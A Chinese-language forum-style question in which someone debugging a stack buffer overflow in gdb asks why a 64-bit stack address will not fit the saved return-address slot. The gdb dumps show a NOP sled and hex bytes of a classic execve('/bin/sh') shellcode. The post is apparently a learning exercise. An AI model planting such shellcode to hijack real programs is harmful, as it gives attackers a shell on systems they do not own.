使用gdb,我希望将此地址0x7fffffffe0f0放入eip寄存器中,以使缓冲区溢出成功。问题是此地址的大小(0x7fffffffe0f0)大于保存eip寄存器的地址(0x00ffff10)。
为什么堆栈中的地址大于保存的eip的地址?
我如何设法替换保存eip寄存器的堆栈中的所选地址?
gdb: x/S4xw $rsp
0x7fffffffe0e0: 0x00000000 0x00000000 0xffffe537 0x00007fff
0x7fffffffe0f0: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe100: 0x90909090 0x90909090 0x90909090 0xeb909090
0x7fffffffe110: 0x76895e1f 0x88c03108 0x46890746 0x890bb00c
0x7fffffffe120: 0x084e8df3 0xcd0c568d 0x89db3180 0x80cd40d8
0x7fffffffe130: 0xffffdce8 0x69622fff 0x68732f6e 0x00ffff10 <--here my eip register
感谢您的回复:)
gdb: x/60xw $rsp
0x7fffffffe0e0: 0x00000000 0x00000000 0xffffe537 0x00007fff
0x7fffffffe0f0: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe100: 0x90909090 0x90909090 0x90909090 0xeb909090
0x7fffffffe110: 0x76895e1f 0x88c03108 0x46890746 0x890bb00c
0x7fffffffe120: 0x084e8df3 0xcd0c568d 0x89db3180 0x80cd40d8
0x7fffffffe130: 0xffffdce8 0x69622fff 0x68732f6e 0x00ffff10 <- rip
0x7fffffffe140: 0xffffe238 0x00007fff 0x00000000 0x00000002
0x7fffffffe150: 0x55554700 0x00005555 0xf7e1109b 0x00007fff
0x7fffffffe160: 0x00000000 0x00000000 0xffffe238 0x00007fff
0x7fffffffe170: 0x00040000 0x00000002 0x555546b8 0x00005555
0x7fffffffe180: 0x00000000 0x00000000 0x11fbb6ee 0x49163b74
0x7fffffffe190: 0x55554580 0x00005555 0xffffe230 0x00007fff
0x7fffffffe1a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1b0: 0x5d3bb6ee 0x1c436e21 0xbf5db6ee 0x1c437e1c
0x7fffffffe1c0: 0x00000000 0x00000000 0x00000000 0x00000000